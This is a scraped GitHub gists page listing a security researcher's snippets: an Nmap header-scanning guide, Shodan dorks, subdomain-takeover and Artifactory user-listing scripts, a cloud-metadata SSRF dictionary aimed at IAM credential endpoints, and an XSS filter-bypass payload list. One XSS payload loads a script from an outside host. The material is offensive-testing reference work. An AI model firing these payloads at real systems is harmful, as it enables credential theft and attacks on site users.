Skip to content

Instantly share code, notes, and snippets.

View maen08's full-sized avatar
🎯
Focusing

Ruheza maen08

🎯
Focusing
71 followers · 66 following
View GitHub Profile
@maen08
maen08 / custom-nse-documentation.md
Created February 22, 2025 17:10

NMAP Custom Script for HTTP Headers Scanning

Introduction

This guide provides a detailed walkthrough on using a custom NMAP script to scan for HTTP header vulnerabilities. The script ranks detected vulnerabilities based on custom-defined metrics to aid security assessments.

For demonstration, a vulnerable Nginx web application will be set up, allowing users to analyze real-time scanning results.

Prerequisite Tools

Ensure the following tools are installed:

@maen08
maen08 / docker-compose.yml
Created October 15, 2024 13:55 — forked from pyrou/docker-compose.yml
Use https://traefik.me SSL certificates for local HTTPS without having to touch your /etc/hosts or your certificate CA.
version: '3'
services:
traefik:
restart: unless-stopped
image: traefik:v2.0.2
ports:
- "80:80"
- "443:443"
labels:
- "traefik.http.services.traefik.loadbalancer.server.port=8080"
@maen08
maen08 / component.txt
Created April 27, 2023 10:00 — forked from JerryShah3/component.txt
Shodan_Component
"For finding template injection"
http.component:"AngularJS"
http.component:"Ruby"
http.component:"Ruby on Rails"
http.component:"Python"
-------------------------------
"For finding php vulnerabilites"
@maen08
maen08 / second-order.py
Created April 11, 2023 09:40 — forked from PatrikHudak/second-order.py
Second-order subdomain takeover
# coding=utf-8
# python3
from urllib.parse import urlparse
import requests
import urllib3
from bs4 import BeautifulSoup
@maen08
maen08 / artifactory_list_users.py
Created February 7, 2023 15:22 — forked from gquere/artifactory_list_users.py
#!/usr/bin/env python3
import requests
import json
import urllib3
import sys
# SUPPRESS WARNINGS ############################################################
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
@maen08
maen08 / cloud_metadata.txt
Created November 9, 2022 21:25 — forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@maen08
maen08 / xxsfilterbypass.lst
Created October 20, 2022 10:29 — forked from rvrsh3ll/xxsfilterbypass.lst
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>